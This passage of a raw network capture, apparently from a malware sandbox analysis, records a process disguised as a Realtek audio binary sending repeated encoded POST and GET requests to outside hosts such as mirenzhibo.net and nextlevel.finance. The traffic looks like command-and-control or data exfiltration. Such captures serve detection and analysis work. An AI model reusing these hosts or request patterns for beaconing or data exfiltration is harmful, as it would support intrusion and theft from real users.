                                                                          33192.168.11.2049778202.95.11.110807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:56.550620079 CET801OUTPOST /wbfy/ HTTP/1.1
                                                                          Host: www.mirenzhibo.net
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mirenzhibo.net
                                                                          Referer: http://www.mirenzhibo.net/wbfy/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 79 65 34 55 33 64 79 49 63 37 79 66 2f 77 66 34 2b 4f 76 31 6a 70 79 45 70 46 4d 6b 54 38 42 6b 66 55 72 52 4c 32 53 58 51 6f 74 78 56 30 4d 49 2b 4e 79 66 4e 53 68 73 32 49 4a 35 55 62 62 4a 54 2f 2b 63 64 70 77 76 6c 31 42 4e 65 7a 58 58 55 5a 6e 38 49 38 59 49 4e 42 53 78 46 67 66 50 39 38 48 4e 4a 79 75 30 30 6e 34 58 78 45 30 63 6e 55 4e 7a 31 6d 35 65 46 4f 63 65 76 6f 68 2b 71 38 59 42 48 31 6e 54 39 74 61 58 35 6f 56 49 70 75 37 59 51 44 4c 34 6c 34 38 4f 55 46 4f 43 5a 55 61 6e 33 58 36 67 4f 77 64 39 6a 61 32 6c 50 56 49 7a 46 67 3d 3d
                                                                          Data Ascii: lV=ac270/Kc6bxJye4U3dyIc7yf/wf4+Ov1jpyEpFMkT8BkfUrRL2SXQotxV0MI+NyfNShs2IJ5UbbJT/+cdpwvl1BNezXXUZn8I8YINBSxFgfP98HNJyu00n4XxE0cnUNz1m5eFOcevoh+q8YBH1nT9taX5oVIpu7YQDL4l48OUFOCZUan3X6gOwd9ja2lPVIzFg==
                                                                          Jan 9, 2025 16:49:56.893767118 CET190INHTTP/1.1 400 Bad Request
                                                                          Server: nginx
                                                                          Date: Thu, 09 Jan 2025 15:49:56 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: d404 Not Found0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.11.2049779202.95.11.110807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:59.368778944 CET821OUTPOST /wbfy/ HTTP/1.1
                                                                          Host: www.mirenzhibo.net
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mirenzhibo.net
                                                                          Referer: http://www.mirenzhibo.net/wbfy/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 7a 2f 6f 55 77 4e 4f 49 61 62 79 65 77 51 66 34 6c 65 76 78 6a 70 2b 45 70 45 49 30 54 4b 70 6b 66 32 7a 52 4b 7a 79 58 54 6f 74 78 4e 45 4d 4e 39 39 79 45 4e 53 6c 6b 32 4a 31 35 55 62 50 4a 54 36 43 63 63 61 59 6f 6b 6c 42 54 66 44 58 56 61 35 6e 38 49 38 59 49 4e 42 58 71 46 67 48 50 39 4d 58 4e 49 51 47 31 72 58 34 59 32 45 30 63 78 6b 4d 36 31 6d 35 73 46 4d 70 4c 76 72 56 2b 71 38 49 42 47 67 62 53 7a 74 61 52 32 49 55 70 68 4e 69 4e 49 78 2f 4e 73 4b 6b 6c 62 6e 44 32 52 69 58 39 71 6c 4f 45 4e 6a 42 50 6e 71 50 4e 4e 58 4a 6f 59 6e 32 61 55 4d 6c 39 4e 53 4b 31 32 65 74 62 2f 39 51 49 4a 4d 41 3d
                                                                          Data Ascii: lV=ac270/Kc6bxJz/oUwNOIabyewQf4levxjp+EpEI0TKpkf2zRKzyXTotxNEMN99yENSlk2J15UbPJT6CccaYoklBTfDXVa5n8I8YINBXqFgHP9MXNIQG1rX4Y2E0cxkM61m5sFMpLvrV+q8IBGgbSztaR2IUphNiNIx/NsKklbnD2RiX9qlOENjBPnqPNNXJoYn2aUMl9NSK12etb/9QIJMA=
                                                                          Jan 9, 2025 16:49:59.710071087 CET190INHTTP/1.1 400 Bad Request
                                                                          Server: nginx
                                                                          Date: Thu, 09 Jan 2025 15:49:59 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: d404 Not Found0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          35192.168.11.2049780202.95.11.110807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:02.209969997 CET2578OUTPOST /wbfy/ HTTP/1.1
                                                                          Host: www.mirenzhibo.net
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mirenzhibo.net
                                                                          Referer: http://www.mirenzhibo.net/wbfy/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 7a 2f 6f 55 77 4e 4f 49 61 62 79 65 77 51 66 34 6c 65 76 78 6a 70 2b 45 70 45 49 30 54 4b 52 6b 65 46 37 52 4b 53 79 58 53 6f 74 78 54 30 4d 4d 39 39 7a 65 4e 57 42 67 32 4a 34 4d 55 59 33 4a 63 38 32 63 56 4c 59 6f 39 56 42 54 61 7a 58 59 55 5a 6e 6c 49 38 49 4d 4e 42 6e 71 46 67 48 50 39 4b 72 4e 49 43 75 31 74 58 34 58 78 45 30 71 6e 55 4e 66 31 6c 4a 57 46 4d 73 77 75 59 4e 2b 71 63 34 42 46 53 7a 53 37 74 61 54 36 6f 55 4c 68 4e 66 64 49 78 7a 72 73 4c 51 44 62 67 66 32 53 45 4b 5a 2f 6d 4b 37 55 54 46 2f 34 75 79 32 45 55 4e 6d 57 46 69 4e 64 38 45 58 43 55 69 69 32 4e 64 4b 72 4e 51 73 66 38 6b 48 73 6e 6b 6d 52 38 6a 76 59 68 4f 58 30 55 31 54 78 68 64 4c 47 6a 33 66 4f 7a 4c 7a 38 77 39 36 34 45 6e 37 4e 48 30 45 37 6f 73 72 77 68 46 53 35 4e 63 66 64 45 47 75 42 48 63 6f 50 52 69 42 6d 52 52 4e 52 6d 77 6b 34 66 4d 64 34 66 4e 79 57 56 62 63 70 69 2f 49 64 4f 4c 2f 43 54 39 77 75 39 30 37 2f 47 38 71 75 49 63 52 64 35 54 48 51 67 58 6b 66 57 65 [TRUNCATED]
                                                                          Data Ascii: lV=ac270/Kc6bxJz/oUwNOIabyewQf4levxjp+EpEI0TKRkeF7RKSyXSotxT0MM99zeNWBg2J4MUY3Jc82cVLYo9VBTazXYUZnlI8IMNBnqFgHP9KrNICu1tX4XxE0qnUNf1lJWFMswuYN+qc4BFSzS7taT6oULhNfdIxzrsLQDbgf2SEKZ/mK7UTF/4uy2EUNmWFiNd8EXCUii2NdKrNQsf8kHsnkmR8jvYhOX0U1TxhdLGj3fOzLz8w964En7NH0E7osrwhFS5NcfdEGuBHcoPRiBmRRNRmwk4fMd4fNyWVbcpi/IdOL/CT9wu907/G8quIcRd5THQgXkfWe/BKw/4DrnNVAFQjPBMg/BxlF/1tBjhCATDrFVhHlGUvzX2Hh/TK0lO29ZQnYpasNSklT48O7mO+ALnzgrrubAguw30yUgsnEPVcLPAEscIkXOyYEQZXiSwd3hUEOZ6tcXsXn0gKyw5D58LyjNxvqMtUD8rCNkAk6DNYr5nfi2h7Iy6A6baKanBxmAml6cljW5R0mpdma+pNbIXgk9+5JXqUeG4nc9cewTpxf+p+07ocQC6VY+zrqeP/ZklU5pJliXegmvpoo3wzlbJ18QDldaQujDlzY0lLDzcQeRYBcJ1g1tTZUIPxt7XUhDhatp8RgQpmNGhTebF98duJbujpnih1X2+FhbDMYDLvIAdDKbtzNEyqNEYlGOfN2MQyJvTqVXk3q7e3qFDim0F4uqavJf6EvhAH0Qmipb9N+crMDGuMewOWpjVmNaxExDRO+6uZvCFx54vcymK7+WbbuEM8icpoM9DTrwpUbLiX+GMVbQao/w6IMQIHvyM3Zhe9AOexoTDdSioXIhra4KwyGkMSTPFS1PPpxMfFp1k/0s9QsThh4wkQuHZQUQjE9ADtNGQSIEmyKYkZ6d+fLaPupyXh0vS2i74iSX28gpoWxXypXqkhdbURuEgzAaOStPYCNYp39kLCMgiYT6orwNqGQQS1og8u4xGVTu1FdGp [TRUNCATED]
                                                                          Jan 9, 2025 16:50:02.210005999 CET5392OUTData Raw: 51 56 49 36 41 75 5a 56 52 4e 47 64 64 38 4c 6b 42 74 43 30 72 48 61 47 4c 4c 6d 43 64 61 47 77 41 67 33 4c 72 71 39 44 2f 54 6b 63 65 4e 73 72 4a 65 69 33 6f 61 75 45 4d 50 4d 47 68 2b 58 51 35 76 47 42 50 4a 6d 52 56 78 34 38 38 41 46 6f 4c 46
                                                                          Data Ascii: QVI6AuZVRNGdd8LkBtC0rHaGLLmCdaGwAg3Lrq9D/TkceNsrJei3oauEMPMGh+XQ5vGBPJmRVx488AFoLFPK8ymwOr2oj//va3lBllwvc9wCON4Pfprl9Rb9ojgVL39F9n9LtOt1clMH5tXjjJ+Y+S2SnQUMSIG567ikMP+8N8sv6cTVBujqW06crNrDabm7u+BMCA+YjGE6MY8NVA6m9jUzsPOdZIVi99SJf7A7qdSEQvZQyCz
                                                                          Jan 9, 2025 16:50:02.566278934 CET190INHTTP/1.1 400 Bad Request
                                                                          Server: nginx
                                                                          Date: Thu, 09 Jan 2025 15:50:02 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: d404 Not Found0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          36192.168.11.2049781202.95.11.110807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:05.043828011 CET532OUTGET /wbfy/?lV=Xeeb3ImT6ZQQytgHl6ygbKjk3RvUis2KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPQegMjeyq5uNXxHJj0c=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.mirenzhibo.net
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:50:05.566122055 CET995INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Thu, 09 Jan 2025 15:50:05 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Data Raw: 33 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 42 61 69 64 75 73 70 69 64 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 [TRUNCATED]
                                                                          Data Ascii: 322<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="Baiduspider" content="noindex, nofollow"><title></title> <script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><body style="padding: 0;margin: 0;"><div><script rel="nofollow" src="http://www.zbywl.com/js.js"></script></div></body></html>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          37192.168.11.204978276.223.54.146807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:10.911880016 CET810OUTPOST /kgjj/ HTTP/1.1
                                                                          Host: www.nextlevel.finance
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.nextlevel.finance
                                                                          Referer: http://www.nextlevel.finance/kgjj/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 62 54 69 68 36 50 48 78 38 5a 66 73 51 56 64 68 6b 78 72 2f 70 34 31 73 64 6b 6e 59 37 42 78 2b 56 44 2f 51 37 64 62 76 39 39 72 30 6e 6e 33 5a 57 52 2f 51 59 48 47 64 66 71 69 38 2f 36 38 4c 74 33 38 30 35 7a 6d 48 39 77 70 66 68 59 32 7a 4f 6e 6d 59 77 2f 61 6a 66 4c 50 63 6f 2f 6e 41 38 4e 31 78 6f 4d 41 43 6a 79 5a 56 7a 50 46 75 4f 64 47 6e 6d 4f 77 2f 45 6a 6d 69 53 35 57 39 30 36 33 67 4d 31 36 41 68 4f 38 70 4d 30 2b 37 44 72 6f 48 41 7a 55 43 78 5a 51 68 76 4a 78 47 6a 38 30 52 65 77 30 53 2f 33 6b 67 4e 76 52 58 39 30 37 33 32 67 3d 3d
                                                                          Data Ascii: lV=r2nTWKLo591VbTih6PHx8ZfsQVdhkxr/p41sdknY7Bx+VD/Q7dbv99r0nn3ZWR/QYHGdfqi8/68Lt3805zmH9wpfhY2zOnmYw/ajfLPco/nA8N1xoMACjyZVzPFuOdGnmOw/EjmiS5W9063gM16AhO8pM0+7DroHAzUCxZQhvJxGj80Rew0S/3kgNvRX90732g==
                                                                          Jan 9, 2025 16:50:11.048551083 CET73INHTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          38192.168.11.204978376.223.54.146807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:14.596770048 CET830OUTPOST /kgjj/ HTTP/1.1
                                                                          Host: www.nextlevel.finance
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.nextlevel.finance
                                                                          Referer: http://www.nextlevel.finance/kgjj/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 55 53 53 68 70 2b 48 78 70 70 66 76 56 56 64 68 74 52 71 34 70 34 70 73 64 6c 54 49 37 54 46 2b 57 6a 50 51 36 5a 33 76 38 39 72 30 7a 58 33 41 59 78 2f 48 59 48 4b 56 66 76 43 38 2f 38 51 4c 74 79 51 30 2b 41 2b 49 2b 41 70 64 70 34 32 31 44 48 6d 59 77 2f 61 6a 66 4c 62 6d 6f 2f 76 41 2f 2b 74 78 75 5a 38 42 74 53 5a 61 30 50 46 75 45 39 47 6a 6d 4f 77 42 45 6e 2f 31 53 37 75 39 30 34 76 67 4d 6b 36 44 36 2b 38 6e 52 6b 2b 6f 4d 4f 52 2f 65 41 73 47 78 72 63 42 76 37 56 54 69 71 35 4c 44 43 41 32 38 6b 34 53 4a 66 6f 2f 2f 32 36 73 72 68 51 41 5a 55 63 4b 6c 50 56 46 54 56 2b 32 30 66 71 41 68 61 30 3d
                                                                          Data Ascii: lV=r2nTWKLo591VUSShp+HxppfvVVdhtRq4p4psdlTI7TF+WjPQ6Z3v89r0zX3AYx/HYHKVfvC8/8QLtyQ0+A+I+Apdp421DHmYw/ajfLbmo/vA/+txuZ8BtSZa0PFuE9GjmOwBEn/1S7u904vgMk6D6+8nRk+oMOR/eAsGxrcBv7VTiq5LDCA28k4SJfo//26srhQAZUcKlPVFTV+20fqAha0=
                                                                          Jan 9, 2025 16:50:14.734087944 CET73INHTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          39192.168.11.204978476.223.54.146807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:17.275460005 CET2578OUTPOST /kgjj/ HTTP/1.1
                                                                          Host: www.nextlevel.finance
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.nextlevel.finance
                                                                          Referer: http://www.nextlevel.finance/kgjj/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 55 53 53 68 70 2b 48 78 70 70 66 76 56 56 64 68 74 52 71 34 70 34 70 73 64 6c 54 49 37 54 64 2b 57 51 33 51 36 34 33 76 36 4e 72 30 77 58 33 46 59 78 2f 2f 59 44 75 52 66 76 65 73 2f 2f 6b 4c 69 30 45 30 37 78 2b 49 6c 51 70 64 32 6f 32 77 4f 6e 6d 33 77 35 36 2f 66 4c 4c 6d 6f 2f 76 41 2f 34 42 78 34 38 41 42 76 53 5a 56 7a 50 46 79 4f 64 47 50 6d 4b 6b 33 45 6e 71 49 53 50 53 39 30 59 2f 67 4a 58 53 44 32 2b 39 42 43 55 2f 31 4d 4f 56 67 65 41 68 2f 78 71 6f 37 76 38 4a 54 67 64 67 4f 55 42 74 74 6c 55 6f 43 55 38 6b 35 72 58 43 46 6a 44 51 38 49 6e 49 6c 69 70 5a 58 64 47 61 71 70 4b 75 44 79 2f 46 47 77 7a 43 52 46 4b 30 39 42 6e 46 34 75 73 4a 4b 67 6c 4e 54 75 49 69 4b 54 58 70 33 45 44 79 31 49 73 46 34 63 77 6e 4b 53 70 53 77 2b 71 66 44 61 59 38 4f 7a 49 66 67 50 36 2f 6b 6f 51 63 58 56 4c 72 4c 50 44 6c 30 65 73 64 48 79 38 52 45 78 77 6e 37 6b 41 70 36 6a 33 39 48 76 37 55 44 47 36 4e 61 6c 63 5a 6c 4a 31 4a 77 69 44 74 7a 48 33 2b 6a 54 65 68 [TRUNCATED]
                                                                          Data Ascii: lV=r2nTWKLo591VUSShp+HxppfvVVdhtRq4p4psdlTI7Td+WQ3Q643v6Nr0wX3FYx//YDuRfves//kLi0E07x+IlQpd2o2wOnm3w56/fLLmo/vA/4Bx48ABvSZVzPFyOdGPmKk3EnqISPS90Y/gJXSD2+9BCU/1MOVgeAh/xqo7v8JTgdgOUBttlUoCU8k5rXCFjDQ8InIlipZXdGaqpKuDy/FGwzCRFK09BnF4usJKglNTuIiKTXp3EDy1IsF4cwnKSpSw+qfDaY8OzIfgP6/koQcXVLrLPDl0esdHy8RExwn7kAp6j39Hv7UDG6NalcZlJ1JwiDtzH3+jTeh5zqsAUZmAQQfNT/YXnvXyc/VSMYgbkScgdoJzVT5h1tswylVf0rBm1zzs5BnQ6joVA8LQPSjX5oxjG+9XkuHrmDWcGIsnvI4geV0eclR+Mif9RFzV866nw/nK/hAwQD05iPK8TBwKFLA2Jdc3IoymcouxkztrL8z2CqrpEaLQwVVW3PsKtbISOmXEsbWxi7TGsdkuMiqKsXjAQJCpnphT3aywQ0gF9VMmfMyIXm11UG/VCggZSpvg4ErsL/e1jNou0b/r/Fzla3ORo5V8CW76xQUoJKCqQ++oEM8ud3DLTcLqiTsGkf5kiu6AKCLT1JO6G8QGd5tm7RHx/V7PjmoBBlGMhe8qDHE0yy0zY8dZH8ys8RfMXca7MAOSWzIbOs8b6Mq2RcIRImPl8Vp+pE+LvwPPPNkpM/0oI2CF66D4bAXFZZjS/kL1RkNHr8l7EuiScSkCjhWOwHBdVJy1n3MwGNWbmNNXxGVbnJvEZq3VD5Eg8Aa4mK3B8f7ZWBq8Qpus0XAds0zxFrrbHVmqvsvpFP+mQ2l/Jc3kHBxvIOsNF5vWTQV5dwaAVL7vCRvTXbz3AWsksySGyRlxTVRv639wJGqsQAfnFSRi/XwGdfoAFaaPVfr3gnwjwXqkdMr75D6elTx+HbgmeksOu846HubUcoCkV312Uqn5N [TRUNCATED]
                                                                          Jan 9, 2025 16:50:17.275537014 CET5401OUTData Raw: 36 4a 63 77 41 75 34 64 70 30 32 75 31 56 4c 4a 46 79 2b 37 48 69 54 47 64 68 37 76 4f 46 66 33 47 37 56 69 35 56 68 54 6b 64 67 46 35 39 42 37 4b 30 54 43 79 4b 71 73 45 42 57 68 53 68 77 35 57 56 48 33 4d 57 5a 50 53 57 73 55 38 50 78 67 6d 6b
                                                                          Data Ascii: 6JcwAu4dp02u1VLJFy+7HiTGdh7vOFf3G7Vi5VhTkdgF59B7K0TCyKqsEBWhShw5WVH3MWZPSWsU8PxgmkTxyhA6pTmoK3ADfYHB9hemsPRjqtg7pZIJtHQa2+GKh2vROXlLqd/ZQ8hjwbjWf72Iu1GTXfBqoQ7p1pzItAxu7u5EERYHHE2Xf02khSecW+b0yUzUhMMbx7QdkSnRQvmMOJdoJUcK2FTpk+XjlDdeT7GoeWz1DAh
                                                                          Jan 9, 2025 16:50:17.419385910 CET73INHTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          40192.168.11.204978576.223.54.146807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:19.942708015 CET535OUTGET /kgjj/?lV=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.nextlevel.finance
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:50:20.090145111 CET374INHTTP/1.1 200 OK
                                                                          content-type: text/html
                                                                          date: Thu, 09 Jan 2025 15:50:20 GMT
                                                                          content-length: 253
                                                                          connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6c 56 3d 6d 30 50 7a 56 2b 44 4c 39 4d 64 68 51 69 65 36 75 71 2f 61 6d 72 76 56 52 33 35 51 38 54 66 2f 6c 6f 74 59 55 58 2b 41 68 6a 4d 6f 51 41 37 46 33 4b 33 46 6a 50 76 38 6b 56 2f 51 42 77 2f 50 64 55 2f 4f 58 4d 2f 72 69 2f 49 62 72 46 59 47 34 78 79 70 69 41 42 77 6e 61 53 57 52 45 47 55 33 75 75 37 5a 59 58 6b 75 4d 4c 42 6e 74 42 41 6f 74 6b 73 6b 68 30 3d 26 4c 53 62 61 54 3d 7a 66 74 34 4c 6f 42 77 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lV=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0=&LSbaT=zft4LoBw"}</script></head></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          41192.168.11.2049786103.106.67.112807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:25.494653940 CET795OUTPOST /k29t/ HTTP/1.1
                                                                          Host: www.furrcali.xyz
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.furrcali.xyz
                                                                          Referer: http://www.furrcali.xyz/k29t/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
